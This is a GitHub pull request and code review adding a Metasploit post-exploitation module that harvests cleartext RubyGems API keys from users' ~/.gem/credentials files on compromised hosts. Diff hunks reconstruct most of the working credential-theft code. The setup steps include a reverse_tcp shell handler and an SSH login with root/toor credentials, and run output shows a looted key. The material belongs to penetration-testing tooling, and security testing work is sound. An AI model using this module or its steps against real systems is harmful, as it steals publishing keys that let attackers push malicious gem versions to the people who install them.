### PR TITLE
Add RubyGems API Key Gather Post Module

### PR DESCRIPTION
**Pull request by claudijd**
This post module will look at the target OS for user directories with ~/.gem/credentials files, which can house RubyGems API keys, which are used by gem owners to publish their Ruby Gems to a central repository and are stored in clear text.  An attacker (or security tester) who recovers this API will be able to publish new gem versions as the gem author.

To replicate this check, please follow these steps...
- Setup a Host B with a .gem/credentials file w/ these contents

```

---
:rubygems_api_key: my_rubygems_api_key
```
- Set up a multi-handler on Host A

use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
set lhost 192.168.10.173
set lport 1337
set ExitOnSession false
exploit –j
- Use ssh login module to start a session on Host A

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.10.142
set username root
set password toor
run
- Go into the post module on Host A and run it against session from Host B

use post/multi/gather/rubygems_api_key
set session 1
run
- The end result should look something like this...
  
  msf post(rubygems_api_key) > run
  
  [_] Finding .gem/credentials
  [_] Looting 1 files
  [+] Found a RubyGems API Key: my_rubygems_api_key
  [_] RubyGems API Key stored in: /root/.msf4/loot/20150126215503_testing_192.168.10.142_host.rubygems.ap_551484.txt
  [_] Post module execution completed

### CODE REVIEW

**Comment by todb** [comment]
I have been patiently waiting years for this. Thanks!

-- 
Sent from a tiny computer.

**Comment by wvu-r7** [comment]
Working on a patch right now, but you can take this, @todb.

**Comment by claudijd** [comment]
@todb

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 1]
```diff
@@ -0,0 +1,65 @@
...
+require 'yaml'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'RubyGems API Key Gather ./gem/credentials',
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Should be ```Multi Gather RubyGems API Key```.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 2]
```diff
@@ -0,0 +1,65 @@
...
+      'Description'   => %q{
+        Post Module to obtain a users RubyGems API Key from ./gem/credentials
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Should be something like ```This module obtains a user's RubyGems API key from ~/.gem/credentials.```.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 3]
```diff
@@ -0,0 +1,65 @@
...
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Jonathan Claudius <jclaudius[at]trustwave.com>',
+                           'Brandon Myers <bmyers[at]trustwave.com>' ],
+      'Platform'      => %w{ bsd linux osx unix },
+      'SessionTypes'  => [ 'shell' ]
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Might want to use the same array syntax as above.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 1 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 106170e

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 4]
```diff
@@ -0,0 +1,65 @@
...
+                             "text/plain",
+                             session,
+                             rubygems_api_key,
+                             "ruby_api_key.txt",
+                             "Ruby API Key")
+
+      print_status("RubyGems API Key stored in: #{loot_path.to_s}")
+    end
+  end
+end
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Missing a newline.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 2 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in ee7ecb3

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 5]
```diff
@@ -0,0 +1,65 @@
...
+require 'yaml'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi RubyGems API Key Gather ./gem/credentials',
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Still missing ```Gather```. :P

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 3 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 747349a

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 6]
```diff
@@ -0,0 +1,65 @@
...
+    download_loot(paths)
+  end
+
+  def download_loot(paths)
+    print_status("Looting #{paths.count} files")
+    paths.each do |path|
+      path.chomp!
+      next if [".", ".."].include?(path)
+
+      if key = YAML.load(read_file(path))[:rubygems_api_key]
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Nice touch with the YAML parsing.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 7]
```diff
@@ -0,0 +1,65 @@
...
+    ))
+  end
+
+  def run
+    print_status("Finding .gem/credentials")
+    paths = enum_user_directories.map {|d| d + "/.gem/credentials"}
+    paths = paths.select { |f| file?(f) }
+
+    if paths.nil? or paths.empty?
+      print_error("No users found with a .gem/credentials file")
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Should be ```~/.gem/credentials``` for clarity.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 3 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: And here 6b6e47a

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 4 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 685c480

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 8]
```diff
@@ -0,0 +1,65 @@
...
+      'SessionTypes'  => [ 'shell' ]
+    ))
+  end
+
+  def run
+    print_status("Finding .gem/credentials")
+    paths = enum_user_directories.map {|d| d + "/.gem/credentials"}
+    paths = paths.select { |f| file?(f) }
+
+    if paths.nil? or paths.empty?
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: You can use ```unless paths.present?``` (Rails).

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 3 above)
Comment (todb) [inline modules/post/multi/gather/rubygems_api_key.rb]: Patch away! Don't let me get in the way.

-- 
Sent from a tiny computer.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 6 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Thanks!

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 7 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 06485d8

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 6 above)
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Usually not idiomatic Ruby to assign inside a conditional. Pretty C-like if you ask me.

Do you need ```key```? Maybe try ```rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key] [...] next unless rubygems_api_key```?

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 9]
```diff
@@ -0,0 +1,65 @@
...
+      loot_path = store_loot("host.rubygems.apikey",
+                             "text/plain",
+                             session,
+                             rubygems_api_key,
+                             "ruby_api_key.txt",
+                             "Ruby API Key")
+
+      print_status("RubyGems API Key stored in: #{loot_path.to_s}")
+    end
+  end
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Missing a newline after this.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 10]
```diff
@@ -0,0 +1,65 @@
...
+
+require 'msf/core'
+require 'yaml'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Missing spaces around the ```=```.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 11]
```diff
@@ -0,0 +1,65 @@
...
+    super( update_info( info,
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Extraneous spaces.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 3 above)
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Alignment is off by one space.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 12]
```diff
@@ -0,0 +1,65 @@
...
+      print_good("Found a RubyGems API Key: #{rubygems_api_key}")
+
+      loot_path = store_loot("host.rubygems.apikey",
+                             "text/plain",
+                             session,
+                             rubygems_api_key,
+                             "ruby_api_key.txt",
+                             "Ruby API Key")
+
+      print_status("RubyGems API Key stored in: #{loot_path.to_s}")
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Maybe ```print_good```?

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 8 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: If I remember correctly, the object type of path in this context is an Array, which doesn't have a #present? 

http://www.ruby-doc.org/core-2.1.5/Array.html

But, I did look into this further (RE: your Rails bread crumb) and noticed that Rails does modify Object with the #present? method.

http://api.rubyonrails.org/classes/Object.html#method-i-present-3F

So, although this technically works with #present?, it seems sort of unnecessary to depend on such functionality if it's not material to the test.  With that said, I'd happily change it if you feel strongly about it.

Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: You are correct. My mistake. I don't think you need the ```nil``` check, so you should be fine with ```if paths.empty?```.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 9 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in  d77f112

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 10 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in d77f112

**Comment by wvu-r7** [comment]
A lot of these style nitpicks could have arrived in patch form instead. I kinda hate commenting on style like this. It's like you're an automatic asshole if you comment on style.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 11 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in d77f112

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 12 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in  d77f112

**Comment by claudijd** [comment]
@wvu-r7 I can appreciate style comments, don't feel bad.

**Comment by wvu-r7** [comment]
@claudijd: You're an awesome contributor, btw. I never expected such a swift response. Thanks!

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 13]
```diff
@@ -0,0 +1,67 @@
...
+                             rubygems_api_key,
+                             "ruby_api_key.txt",
+                             "Ruby API Key")
+
+      print_good("RubyGems API Key stored in: #{loot_path.to_s}")
+    end
+  end
+
+end
+
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Doh! Now there's an extra newline. The original file didn't have any EOF newline. That's all. :)

**Comment by claudijd** [comment]
@wvu-r7 Thanks!  Your timely and thorough reviews over the years have always been appreciated.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 13 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in c29b748

**Comment by wvu-r7** [comment]
You're hammering out fixes faster than I can comment!

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 6 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: I took a slightly different (more readable IMO) approach in eed9fbe

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 5 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 06485d8

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 8 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in c496d2c

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 14]
```diff
@@ -0,0 +1,63 @@
...
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Jonathan Claudius <jclaudius[at]trustwave.com>',
+                           'Brandon Myers <bmyers[at]trustwave.com>' ],
+      'Platform'      => %w{ bsd linux osx unix },
+      'SessionTypes'  => %w{ shell }
+    ))
+  end
+
+  def run
+    print_status("Finding .gem/credentials")
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Ah, one more needs a tilde. :)

**Comment by claudijd** [comment]
@wvu-r7 Ok, I think I've gotten all of them.  Let me know if I missed anything.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 15]
```diff
@@ -0,0 +1,63 @@
...
+  end
+
+  def download_loot(paths)
+    print_status("Looting #{paths.count} files")
+    paths.each do |path|
+      path.chomp!
+      next if [".", ".."].include?(path)
+
+      rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
+      next unless rubygems_api_key.nil?
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: Looks like the logic is reversed here. Should be ```next unless rubygems_api_key```, which is the same as ```next if rubygems_api_key.nil?``` but not ```next unless rubygems_api_key.nil?```.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 14 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in a9e480e

**Comment by mubix** [comment]
The battery life of the electronics I get emails on hates you both.

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 15 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Whoopsies! Fixed in 1f9286d

**Comment by claudijd** [comment]
@mubix :+1:

**Comment by claudijd** [comment]
Also this => https://twitter.com/iamdevloper/status/397664295875805184

**Comment by claudijd** [comment]
@wvu-r7 I think I'm caught up with the latest.  Send more if you got them.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 16]
```diff
@@ -0,0 +1,63 @@
...
+  end
+
+  def download_loot(paths)
+    print_status("Looting #{paths.count} files")
+    paths.each do |path|
+      path.chomp!
+      next if [".", ".."].include?(path)
+
+      rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
+      next if rubygems_api_key.nil?
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: ```unless``` is generally preferred. Tbh, it confuses me a bit more. :)

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 17]
```diff
@@ -0,0 +1,63 @@
...
+      
+      print_good("Found a RubyGems API Key: #{rubygems_api_key}")
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: You can drop the caps from ```Key```.

File: modules/post/multi/gather/rubygems_api_key.rb [hunk 18]
```diff
@@ -0,0 +1,63 @@
...
+
+      loot_path = store_loot("host.rubygems.apikey",
+                             "text/plain",
+                             session,
+                             rubygems_api_key,
+                             "ruby_api_key.txt",
+                             "Ruby API Key")
+
+      print_good("RubyGems API Key stored in: #{loot_path.to_s}")
```
Comment (wvu-r7) [inline modules/post/multi/gather/rubygems_api_key.rb]: You can drop the caps from ```Key```. The colon can go, too.

**Comment by wvu-r7** [comment]
I think that's everything. Normally, I'd send over a PR or make the changes myself, but once in a blue moon, we'll hammer it out in the comments. Also helps to put things up for discussion instead of saying "my way or the highway."

**Comment by wvu-r7** [comment]
It's... didactic. For both parties. Also, I am really sorry, mübix. :)

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 16 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 2bb9314

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 17 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 2bb9314

File: modules/post/multi/gather/rubygems_api_key.rb (hunk 18 above)
Comment (claudijd) [inline modules/post/multi/gather/rubygems_api_key.rb]: Fixed in 2bb9314

**Comment by claudijd** [comment]
@wvu-r7 ok, just wrapped up the latest comments and did a quick sanity check (made some bug fixes) and I think it's caught up.  If you got more, let me know.

**Comment by wvu-r7** [comment]
```
msf post(rubygems_api_key) > run

[*] Finding ~/.gem/credentials
[*] Looting 1 files
[+] Found a RubyGems API key: my_rubygems_api_key
[+] RubyGems API key stored in /home/wvu/.msf4/loot/20150126232806_default_10.6.0.59_rubygems.apikey_897041.txt
[*] Post module execution completed
msf post(rubygems_api_key) > loot 

Loot
====

host       service  type             name                  content     info              path
----       -------  ----             ----                  -------     ----              ----
10.6.0.59           rubygems.apikey  rubygems_api_key.txt  text/plain  RubyGems API key  /home/wvu/.msf4/loot/20150126232806_default_10.6.0.59_rubygems.apikey_897041.txt

msf post(rubygems_api_key) > cat /home/wvu/.msf4/loot/20150126232806_default_10.6.0.59_rubygems.apikey_897041.txt
[*] exec: cat /home/wvu/.msf4/loot/20150126232806_default_10.6.0.59_rubygems.apikey_897041.txt

my_rubygems_api_keymsf post(rubygems_api_key) > 
```

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/d53f4e1178028955b05d543d4b98c11e5aaae4d3

**Comment by wvu-r7** [comment]
Eh, maybe PR'ing against this PR would have been better than making all these comments. :-)

**Comment by claudijd** [comment]
@wvu-r7 thanks again, see you next time :)

**Comment by wvu-r7** [comment]
Thanks for the great submission! I'm sure @todb is very happy now. :)

**Pull request merged**